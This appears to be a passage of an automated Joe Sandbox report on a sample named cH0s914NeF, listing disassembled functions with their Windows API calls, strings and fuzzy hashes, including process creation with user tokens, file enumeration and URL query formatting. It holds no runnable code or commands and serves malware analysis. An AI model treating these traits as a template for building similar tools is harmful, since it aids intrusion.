write_string.LIBCMT ref: 03A815F8
write_string.LIBCMT ref: 03A8162F
write_multi_char.LIBCMT ref: 03A81651
free.LIBCMT ref: 03A81665
_isleadbyte_l.LIBCMT ref: 03A81736
write_char.LIBCMT ref: 03A8174C
write_char.LIBCMT ref: 03A8176D
_errno.LIBCMT ref: 03A81870
_invalid_parameter_noinfo.LIBCMT ref: 03A8187B

Strings

, xrefs: 03A81533
@, xrefs: 03A80F0F

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3318157856-1077428164
Opcode ID: aca5eff7b48e60a8575da89cd2ec2425052cdd0f99735d1b91aa5be48c8f36fa
Instruction ID: f9ef87d2eef09a70c47b1553578eb1a28eca16b3a44e3025b0c7fb0ed85bd0d0
Opcode Fuzzy Hash: aca5eff7b48e60a8575da89cd2ec2425052cdd0f99735d1b91aa5be48c8f36fa
Instruction Fuzzy Hash: FA422272608A8486EB29EF25D5443BEABB4F742784F1C151BDE8A57B98DB3CC543CB40

Uniqueness

Uniqueness Score: -1.00%

Function 03A803DC Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03A8043D

Part of subcall function 03A7F454: _getptd.LIBCMT ref: 03A7F46A
Part of subcall function 03A7F454: __updatetlocinfo.LIBCMT ref: 03A7F49F
Part of subcall function 03A7F454: __updatetmbcinfo.LIBCMT ref: 03A7F4C6

_errno.LIBCMT ref: 03A80442

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

_fileno.LIBCMT ref: 03A8046F

Part of subcall function 03A83914: _errno.LIBCMT ref: 03A8391D
Part of subcall function 03A83914: _invalid_parameter_noinfo.LIBCMT ref: 03A83928

write_multi_char.LIBCMT ref: 03A80A9F
write_string.LIBCMT ref: 03A80ABC
write_multi_char.LIBCMT ref: 03A80AD9
write_string.LIBCMT ref: 03A80B38
write_string.LIBCMT ref: 03A80B6F
write_multi_char.LIBCMT ref: 03A80B91
free.LIBCMT ref: 03A80BA5
_isleadbyte_l.LIBCMT ref: 03A80C76
write_char.LIBCMT ref: 03A80C8C
write_char.LIBCMT ref: 03A80CAD
_errno.LIBCMT ref: 03A80DA7
_invalid_parameter_noinfo.LIBCMT ref: 03A80DB2

Strings

, xrefs: 03A80A73

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3318157856-3916222277
Opcode ID: 442108010190e59218a5984551b34ec8e46758b4fb98f8e7cd36874cc15003ad
Instruction ID: 528c7034e2914db33748cc267a825d02e29fa26d59ec9f6fab287c808e3bc058
Opcode Fuzzy Hash: 442108010190e59218a5984551b34ec8e46758b4fb98f8e7cd36874cc15003ad
Instruction Fuzzy Hash: 12324573608B84AAEB25EF29D5443BEBB74F742788F18110BDE8A17754DB78C589CB01

Uniqueness

Uniqueness Score: -1.00%

Function 036802D7 Relevance: 30.8, APIs: 15, Strings: 2, Instructions: 1030COMMON

Download Yara Rule

APIs

Part of subcall function 0367E89B: _getptd.LIBCMT ref: 0367E8B1
Part of subcall function 0367E89B: __updatetlocinfo.LIBCMT ref: 0367E8E6
Part of subcall function 0367E89B: __updatetmbcinfo.LIBCMT ref: 0367E90D

_errno.LIBCMT ref: 0368033D

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

_fileno.LIBCMT ref: 0368036A

Part of subcall function 03682D5B: _errno.LIBCMT ref: 03682D64
Part of subcall function 03682D5B: _invalid_parameter_noinfo.LIBCMT ref: 03682D6F

write_multi_char.LIBCMT ref: 036809A6
write_string.LIBCMT ref: 036809C3
write_multi_char.LIBCMT ref: 036809E0
write_string.LIBCMT ref: 03680A3F
write_multi_char.LIBCMT ref: 03680A98
free.LIBCMT ref: 03680AAC
_isleadbyte_l.LIBCMT ref: 03680B7D
write_char.LIBCMT ref: 03680B93
write_char.LIBCMT ref: 03680BB4
_errno.LIBCMT ref: 03680CB7
_invalid_parameter_noinfo.LIBCMT ref: 03680CC2

Strings

, xrefs: 0368097A
@, xrefs: 03680356

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3613058218-1077428164
Opcode ID: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
Instruction ID: 4767d9dd0385b31be21306a6fbc1baa902c0c3a6e8a0e1e8c2aff24c26181ceb
Opcode Fuzzy Hash: 378339f2bfa88e71ac19cea4aeeb69c74ed1450f75d131b3461b833e448d52f1
Instruction Fuzzy Hash: 0D521A30918B49AEDB2CEB1CC4552B9B7E5FB9D300F285B2DD8C7C7252D674D84B8682

Uniqueness

Uniqueness Score: -1.00%

Function 0367F823 Relevance: 29.0, APIs: 15, Strings: 1, Instructions: 1022COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0367E89B: _getptd.LIBCMT ref: 0367E8B1
Part of subcall function 0367E89B: __updatetlocinfo.LIBCMT ref: 0367E8E6
Part of subcall function 0367E89B: __updatetmbcinfo.LIBCMT ref: 0367E90D

_errno.LIBCMT ref: 0367F889

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

_fileno.LIBCMT ref: 0367F8B6

Part of subcall function 03682D5B: _errno.LIBCMT ref: 03682D64
Part of subcall function 03682D5B: _invalid_parameter_noinfo.LIBCMT ref: 03682D6F

write_multi_char.LIBCMT ref: 0367FEE6
write_string.LIBCMT ref: 0367FF03
write_multi_char.LIBCMT ref: 0367FF20
write_string.LIBCMT ref: 0367FF7F
write_multi_char.LIBCMT ref: 0367FFD8
free.LIBCMT ref: 0367FFEC
_isleadbyte_l.LIBCMT ref: 036800BD
write_char.LIBCMT ref: 036800D3
write_char.LIBCMT ref: 036800F4
_errno.LIBCMT ref: 036801EE
_invalid_parameter_noinfo.LIBCMT ref: 036801F9

Strings

, xrefs: 0367FEBA

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3613058218-3916222277
Opcode ID: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
Instruction ID: 434e9351bda86c3262a59c13247604137a8aec09190f127ee80812f5a8564a7d
Opcode Fuzzy Hash: ab974c686d4cf2a6d6f964f9f08ddbfde3681fa99218c6095000c369d33f032e
Instruction Fuzzy Hash: 98525B30918B498ED72CDB5CC854BBAB7E1FB56310FA8062DD9C7CB252DA34D8478782

Uniqueness

Uniqueness Score: -1.00%

Function 03A761C0 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 03A763EE
_snprintf.LIBCMT ref: 03A7640B
_snprintf.LIBCMT ref: 03A7632D

Part of subcall function 03A7D57C: _errno.LIBCMT ref: 03A7D5B3
Part of subcall function 03A7D57C: _invalid_parameter_noinfo.LIBCMT ref: 03A7D5BE

_snprintf.LIBCMT ref: 03A76660
_snprintf.LIBCMT ref: 03A769BC

Strings

?%s, xrefs: 03A768DF
?%s=%s, xrefs: 03A763E2
%s%s, xrefs: 03A7675F
%s%s: %s, xrefs: 03A7631C
%s&%s=%s, xrefs: 03A763FF
%s&%s, xrefs: 03A768F2
%s%s, xrefs: 03A7664F, 03A76679, 03A7681D, 03A769AE

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
API String ID: 3442832105-1222817042
Opcode ID: 1f56280164754b5557220eac88cc4c9762102babc9b28307cf2a7c73b7346fc6
Instruction ID: e1abcea43676fc6f98bb5a3bd2368e0022cd8b7989cf8852e8e0a13c7c8f74fa
Opcode Fuzzy Hash: 1f56280164754b5557220eac88cc4c9762102babc9b28307cf2a7c73b7346fc6
Instruction Fuzzy Hash: C732A566614E8492EB25DF29E5813E9B3B0FF99799F445102DF8917B30EF38D2A6C340

Uniqueness

Uniqueness Score: -1.00%

Function 03A70F28 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A70F5B

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

Part of subcall function 03A6CFCC: malloc.LIBCMT ref: 03A6CFDF

Part of subcall function 03A6CFFC: htonl.WS2_32 ref: 03A6D007

GetCurrentDirectoryA.KERNEL32 ref: 03A70FD3
FindFirstFileA.KERNEL32 ref: 03A7100C
GetLastError.KERNEL32 ref: 03A7101B
free.LIBCMT ref: 03A71056
free.LIBCMT ref: 03A71063

Part of subcall function 03A7D188: HeapFree.KERNEL32 ref: 03A7D19E
Part of subcall function 03A7D188: _errno.LIBCMT ref: 03A7D1A8
Part of subcall function 03A7D188: GetLastError.KERNEL32 ref: 03A7D1B0

FileTimeToSystemTime.KERNEL32 ref: 03A71070
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 03A71081
FindNextFileA.KERNEL32 ref: 03A7113E
FindClose.KERNEL32 ref: 03A7114F

Strings

%s, xrefs: 03A70FF1
D0%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 03A710C3
F%I64d%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 03A71121
.\*, xrefs: 03A70FB7

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
API String ID: 723279517-1754256099
Opcode ID: dd787fa29133a0fd75daa2a63f366151dc49c673a2593fbac1e01e080f930c93
Instruction ID: 1d11b1ac6b54f80390ec2a0886e9d2d87fe69e9f0c66dfffb96f828e8509a214
Opcode Fuzzy Hash: dd787fa29133a0fd75daa2a63f366151dc49c673a2593fbac1e01e080f930c93
Instruction Fuzzy Hash: 74517076304B9586D710DB62E88079EB7A5F785BD4F40401BEE8A5BB58EF7CC60ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1C0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 598stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 0040E1E0
strlen.MSVCRT ref: 0040E1F2
malloc.MSVCRT ref: 0040E201
isspace.MSVCRT ref: 0040E21D
_strnicmp.MSVCRT ref: 0040E29D
_strnicmp.MSVCRT ref: 0040E2C8

Strings

NAN, xrefs: 0040E349
@, xrefs: 0040EABD
P, xrefs: 0040EAB5
INF, xrefs: 0040E296
INITY, xrefs: 0040E2C1

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: _strnicmp$isspacelocaleconvmallocstrlen
String ID: @$INF$INITY$NAN$P
API String ID: 220484588-3890526612
Opcode ID: cb0ca9b7257405c75efd6788b26e4992c5515938270a87d05fb0d5002d14a5d8
Instruction ID: 88e7c5a8aa323a0ffbf44d99e3feb74ae90f7029328d1e39338cb2d2ff9e7047
Opcode Fuzzy Hash: cb0ca9b7257405c75efd6788b26e4992c5515938270a87d05fb0d5002d14a5d8
Instruction Fuzzy Hash: 6A3227726186808AD724CF26E4447AFB7A1F784784F50852BEF8953B98EB3DC555CF08

Uniqueness

Uniqueness Score: -1.00%

Function 00423EC0 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00423F20
strlen.MSVCRT ref: 00423F56
strlen.MSVCRT ref: 00423FBF
strlen.MSVCRT ref: 00424030
strlen.MSVCRT ref: 00424093
strlen.MSVCRT ref: 004240E3

Strings

basic_string::append, xrefs: 004241A9, 004241D0, 004241DC, 004241E8
*, xrefs: 0042443F

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: d89d714063e19a994a12147a380ea3415244a0741b18f2bd0c59693197c093cc
Instruction ID: c22059d89d87a1e8dd99b83bc6cf00de3d523e73193c9dc1247266d83b60f530
Opcode Fuzzy Hash: d89d714063e19a994a12147a380ea3415244a0741b18f2bd0c59693197c093cc
Instruction Fuzzy Hash: B5D17866301AA082DB14EE17E55436E6761E39AFC8F888127DF9E0BB55DF3DC0828349

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA10 Relevance: 19.0, APIs: 6, Strings: 4, Instructions: 1454stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040FA9D

Strings

!, xrefs: 004115C0
, xrefs: 00410DF7
inity, xrefs: 0041115A
5, xrefs: 004100A3

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: strlen
String ID: $!$5$inity
API String ID: 39653677-1328200385
Opcode ID: 555d6d86c5eb236261791fe7ed86024e2f5e0fcb3bf1e7b1eb3966eca3402bec
Instruction ID: f1373629b4257162ff8c059d0edaba5f4fd5722e2805acb80b5ec850868ad53e
Opcode Fuzzy Hash: 555d6d86c5eb236261791fe7ed86024e2f5e0fcb3bf1e7b1eb3966eca3402bec
Instruction Fuzzy Hash: 94D2CC722086848AD734CF29E4407EBBBA1F785788F14822ADB8647B58DB7DD4C5CF49

Uniqueness

Uniqueness Score: -1.00%

Function 03A70240 Relevance: 18.2, APIs: 12, Instructions: 157processCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32 ref: 03A7029B
GetLastError.KERNEL32 ref: 03A702A9
GetLastError.KERNEL32 ref: 03A702CD

Part of subcall function 03A6FA80: MultiByteToWideChar.KERNEL32 ref: 03A6FAAD
Part of subcall function 03A6FA80: MultiByteToWideChar.KERNEL32 ref: 03A6FAD5

CreateProcessA.KERNEL32 ref: 03A7031F
GetLastError.KERNEL32 ref: 03A70329
GetCurrentDirectoryW.KERNEL32 ref: 03A70679
GetCurrentDirectoryW.KERNEL32 ref: 03A70693
CreateProcessWithTokenW.ADVAPI32 ref: 03A706D7

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
String ID:
API String ID: 3044875250-0
Opcode ID: ef855b0e09373d15b0c2c3b2916aafe651afc16b624a92ab55f267427aaf5471
Instruction ID: fc1aef3d2481579314f3e2e03e38df3f0efc38c22ec23b3280b51f62e4aa81d0
Opcode Fuzzy Hash: ef855b0e09373d15b0c2c3b2916aafe651afc16b624a92ab55f267427aaf5471
Instruction Fuzzy Hash: C1618B72304B40C6EB24CF25E88475E73A9F789B98F05512BDA8987B58DF7CC585CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03A7780C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A7783B

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

_snprintf.LIBCMT ref: 03A77853

Part of subcall function 03A7D57C: _errno.LIBCMT ref: 03A7D5B3
Part of subcall function 03A7D57C: _invalid_parameter_noinfo.LIBCMT ref: 03A7D5BE

FindFirstFileA.KERNEL32 ref: 03A7785E
free.LIBCMT ref: 03A7786A

Part of subcall function 03A7D188: HeapFree.KERNEL32 ref: 03A7D19E
Part of subcall function 03A7D188: _errno.LIBCMT ref: 03A7D1A8
Part of subcall function 03A7D188: GetLastError.KERNEL32 ref: 03A7D1B0

malloc.LIBCMT ref: 03A778BA
_snprintf.LIBCMT ref: 03A778D2
free.LIBCMT ref: 03A778FA
FindNextFileA.KERNEL32 ref: 03A77913
FindClose.KERNEL32 ref: 03A77924

Strings

%s\*, xrefs: 03A77840

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
String ID: %s\*
API String ID: 2620626937-766152087
Opcode ID: b766a1522dcccdc6d8e5ae5440176dc1c71bb58c3c2772cf12c04a584ca98bc8
Instruction ID: 29000badd4a72896bb5f29113793059693ce6c8f4ad0378bbe04823c23282861
Opcode Fuzzy Hash: b766a1522dcccdc6d8e5ae5440176dc1c71bb58c3c2772cf12c04a584ca98bc8
Instruction Fuzzy Hash: FD31F2163043C149EA56DB636D903B9BB29B78BFE0F488157CEE92BB65CA3DC152C700

Uniqueness

Uniqueness Score: -1.00%

Function 00424470 Relevance: 16.8, Strings: 13, Instructions: 561COMMON

Download Yara Rule

Strings

p3K, xrefs: 00424829
p?K, xrefs: 004246AB
`<K, xrefs: 004245D4
`F, xrefs: 00424D62
@$K, xrefs: 00424C18
AK, xrefs: 00424DC9
`@K, xrefs: 00424D82
@BK, xrefs: 00424E10
`#K, xrefs: 004247B5
F, xrefs: 004248FF
F, xrefs: 00424E3E
F, xrefs: 004247F2
cannot create shim for unknown locale::facet, xrefs: 00424F03

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: F$@$K$@BK$`#K$`<K$`@K$`F$cannot create shim for unknown locale::facet$p3K$p?K$AK$F$F
API String ID: 0-3055129222
Opcode ID: 9742417bf8f84babae5944212b5b14f2d187c3174bfd486e5de3b32f9fc225ee
Instruction ID: 4f8ea8f35da54562c471ed9319cc0e2142fd28071dc69048a9028f5e9af62b95
Opcode Fuzzy Hash: 9742417bf8f84babae5944212b5b14f2d187c3174bfd486e5de3b32f9fc225ee
Instruction Fuzzy Hash: 26529C72300B90D7E758CF26E56430A77A0F396B88F54811ACB8907BA1DB7DE435C39A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBC0 Relevance: 12.0, APIs: 8, Instructions: 50COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0040BBD4
RtlLookupFunctionEntry.KERNEL32 ref: 0040BBEB
RtlVirtualUnwind.KERNEL32 ref: 0040BC2D
SetUnhandledExceptionFilter.KERNEL32 ref: 0040BC74
UnhandledExceptionFilter.KERNEL32 ref: 0040BC81
GetCurrentProcess.KERNEL32 ref: 0040BC87
TerminateProcess.KERNEL32 ref: 0040BC95
abort.MSVCRT ref: 0040BC9B

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
String ID:
API String ID: 4278921479-0
Opcode ID: f6506e6d396107ad021d142e487fb58836f0e9ea9d88da2f8f3fec0b53ca560d
Instruction ID: 303ed03fa3729ddce00fcf97083d30500fd480cce64ad97836abdfd0509da601
Opcode Fuzzy Hash: f6506e6d396107ad021d142e487fb58836f0e9ea9d88da2f8f3fec0b53ca560d
Instruction Fuzzy Hash: D421DDB5612B04A9FB408F61F894B8937B5F749B98F84022ADE4E57724EF3CC549C348

Uniqueness

Uniqueness Score: -1.00%

Function 0049D270 Relevance: 11.8, Strings: 9, Instructions: 561COMMON

Download Yara Rule

Strings

0K, xrefs: 0049D43A
0K, xrefs: 0049D7FA
0K, xrefs: 0049D61A
0K, xrefs: 0049D79A
`+J, xrefs: 0049D274
0K, xrefs: 0049D85A
0K, xrefs: 0049D5BA
0K, xrefs: 0049D49A
0K, xrefs: 0049D73A

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: abort
